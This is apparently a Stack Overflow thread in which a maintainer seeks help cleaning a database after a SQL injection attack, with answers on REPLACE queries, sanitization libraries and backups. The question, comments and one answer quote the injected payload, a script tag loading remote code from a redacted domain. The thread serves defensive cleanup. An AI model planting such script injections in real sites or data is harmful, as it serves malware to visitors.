# Can't Clean the Results of a SQL Injection

Tags: sql, sql-server, sql-injection

A website that I maintain, but didn't develop, was recently attacked through SQL Injection - we're currently working to plug the holes, however, I'm also in the process of cleaning up the database.  We've got several thousand records, each with 20-30 columns of data that had malicious code appended to the end.

I've tried going through and doing a replace on the text for each column, but somehow it's not finding the offending data, and skipping right over it.

1) How can they insert data that I can't search on?

2) How can I get it removed without having to touch each record individually?

I've tried going through the IIS logs to find my answers, but so far it's been a losing battle.

Additional information can be provided, but I want to keep things sparse due to current security concerns.

Comment: Can you post some of the corrupted rows?  Perhaps what the data used to be, and what it is post-attack?

Comment: Give us some sample rows of data that you can't seem to catch and clean.. It'll help.. And could you provide us with the means by which you have been cleaning the data up? For your security, go show the columns with the dirt.. no need to add anything else.. you can even go ahead and turn the good text to any string, for safety..

Comment: Have you considered restoring the data from the last known good backup? There's obviously some risk of losing changes that were not backed up, but there'll be a lot fewer headaches too.

Comment: They cannot insert data which you can't search on.  There's got to be a flaw in your search.  We can probably help find the flaw, but not if you don't show us the search.  Consider posting a small sample of the table and the search/update queries which aren't working.

Comment: I do agree with Andrew and Joe on restoring from backup, but before heading down that road.. We should find out what data backup methods are in place, if the database is highly transactional and if there's a time-check that can be determined to find out if there's any risk of losing data. Either approach, that will be good to know. Restoring from backup should be one of the last options, in case there's a risk of losing data. Besides, if there's at least a good backup on standby, there'll be a few ways to verify that the cleanup is useful..

Comment: That's the strange part - it looks and reads just like string data.  The added content is: `</title><script src=http://XXXXXXX.com/XX.php ></script>`   I removed the domain and filename for obvious purposes.   This happened once in the past, and I was able to find and replace very easily, but as I stated - REPLACE isn't locating it this time for some reason.

Comment: `Select * From TableName Where infectedColumn like '%<script%'`

Comment: I updated my answer with the REPLACE syntax I used.  Comment there if you don't get it to work or if the injected code varies alot.

Comment: If that added content is the exact same one for all, then there might be something a bit off with your filter code. Also, you may have to try and copy the text value itself; don't retype what you see. If `replace` doesn't work, then you'll have to attempt the clean up using regular expressions. It could be that the domain and file vary, so you can't just use multiple replace attempts. Again, you may have to try regular expressions to clean it up..

Comment: @Kev You're only one google away from finding articles that show the prevalence of kits that allow attackers to do automated searches for SQL injection vulnerabilities, and there have been known attacks in the wild that results that result in this type of damage.  I don't think this is localized at all, and the cleaning techniques would apply to anyone that has had malicious javascript injected into their database fields.

Comment: @Kev Would like to cite this as an example that this problem is not very localized.  This poseter as well as another who replied very similar issue: http://social.msdn.microsoft.com/forums/en-US/sqlgetstarted/thread/9d76d7c5-596d-4fed-b58a-e64224a908df/

Comment: @AaronLS we know SQL Injection attacks are common. But the OP is basically asking, "how do I find/replace my specific malicious content"

Comment: @AaronLS - the community is not here to clean up the OP's server for him. There is not enough detail about the specifics of the infection which will result in answers that are at best too general due to having to speculate about the data infected. If the OP wants to reword the question and ask how to replace specific strings in his data and show us what he tried, then I'd be happy to re-open. At the moment the question is just a call for help with not enough detail leading to lists of overly broad answers.

Comment: @Kev No, we're not here to clean up his server for him, but the community is here to help provide techniques to address scenarios that other have and will encounter.  If you applied your same pessimistic logic to every question you'd go around closing questions saying "The community is not here to program a fix for your problem".  "The community is not here to tell you what your compiler error means." "The community is not here to tell you what best practices are for tiered applications." etc.

Comment: @Andrew Most of the attacks result in some sort of javascript injected so it's not so specific to his situation as you imply.

Comment: @AaronLS To be honest, if I had been voting to close it, I would have done so as a duplicate of one of what I expect would be many results for parsing/locating script tags.

Answer (score 3):

I'm posting this as an answer even though I'm not 100% sure it will work in your situation ONLY because it's too long for a comment.  If I get downvoted, oh, well, I just want to help.

The answer to point 1 is "There are several techniques for this."  Obfuscating the payload is a hallmark of well-written malware.  They may use character encoding, or some other technique so that what shows up in the UI isn't what's really in the database. Once you figure out what's REALLY in the database, you should be able to search on it.

For point 2, it depends heavily on what the malicious code is.  If it's Javascript used for XSS or CSRF, I'd try the following:

Write a program (or enlist a developer to do so) that does the following:

- Loop through the affected tables
- Use a sanitation libarary to clean
  the text.
- Update the row with the sanitized data

I don't know what tools you have available, but if it were me, this would be a .NET app, and I would use the [Microsoft Web Protection Library](http://wpl.codeplex.com/) to sanitize the text.  It has some very useful functions, such as

- HtmlEncode()
- GetSafeHtmlFragment() - preserves html but removes anything malicious, using a whitelist approach.  (This is the method I'd try if I were trying to clean malicious script).

It's not what hte Web Protection Library was *intended* for, but it sure wouldn't hurt to try it.

there's a video [here](http://msdn.microsoft.com/en-us/security/ee909461) showing the *intended* use of the library.

Comment: Before I did this type of sanitation though, I'd probably try more specific attempts to completely remove the malicious code.  The approach above basically leaves the malicious code in place but makes it benign so that it should no longer be dangerous.  So for example they might have put some malicious javascript in a field, and the sensitization will replace things like `<` with `&lt;` so that if you display that data on a webpage the user will actually see some javascript code, but that code won't actually run.

Comment: So essentially your data is still damaged in that those fields will display with the extra appended data, but will no longer be dangerous.  Thus I would first try to identify these records using targeted update scripts to completely remove the malicious code.  And then followup with David's suggestion to ensure you disable any stragglers you missed.

Comment: I agree, but my thought process is that this should take your average .NET developer less than 15, minutes to write a test app(assuming they know which tables are affected) and then time to try to clean one table.  In other words, it's worth a shot with minimal investment in time.

Comment: Even better might be to reproduce one of the affected pages in ASP.NET and just sanitize all the output using said library.  If that works, then the idea is even more plausible.  Of course, this all assumes they have .NET devs, which is a big assumption. I'm sure there's a PHP or other library similar to this one that would work, though.  I'm only speaking in what I'm most famililar with, not what the best tool for the job would be.  Just trying to throw  ideas out there.

Comment: I agree and I think it is a good idea.  Just wanted to make sure they understand what it will and will not accomplish.

Comment: Completely agree - we're currently rewriting with heavy emphasis of cleaning all data connections in the website.  However, client doesn't want to upgrade to .NET, so we're doing the best we can with Classic ASP, at least for the time being.

Comment: I'm not familiar with classic ASP but a google came up with this:  http://asepandria.blogspot.com/2007/03/using-serverhtmlencode-on-classic-asp.html

Answer (score 1):

There are tools that let you inspect transaction logs which would help you narrow down what is affected.  If the attack occurred in a batch operation then all of the transactions probably occurred around the same point and time and thus would be fairly localized in the transaction logs.

To answer your question #1, you would need to give some examples of the data they appended to a column and the where clause/criteria you are trying to use to find that data.

`Select REPLACE ( 'Something Something</title><script src=http://XXXXXXX.com/XX.php ></script>' , '</title><script src=http://XXXXXXX.com/XX.php ></script>' , '' )`

Seems to work for me.  Are there variations in the url?

Answer (score 0):

I'm sorry for your pain in the neck.

Here are a couple of suggestions.

First, you need to FIND the bogus rows of data. Don't try to fix until you find.

Some things to try.

1. dump an affected table to a csv or other text file.  Then use a simple text editor, or maybe a spreadsheet program, to page through it and see if you can spot the patterns of corruption.
2. Try the old `SELECT COUNT(*), COLUMN FROM TABLE GROUP BY COLUMN` trick til you find the columns that have crap in them.

Once you know where to look, you can devise either SQL or client code to do the cleaning.

Answer (score 0):

> How can they insert data that I can't search on?

Perhaps they executed under the privileges of the db connection that the app uses, and you are running under a different, lesser privilege.

> How can I get it removed without having to touch each record
>   individually?

if there is a pattern to the changes they made, you can search on that pattern using features like charindex() and LIKE.  If the pattern is consistent, but may occur in any (textual) column, then you can read system tables to dynamically to build queries that query every column.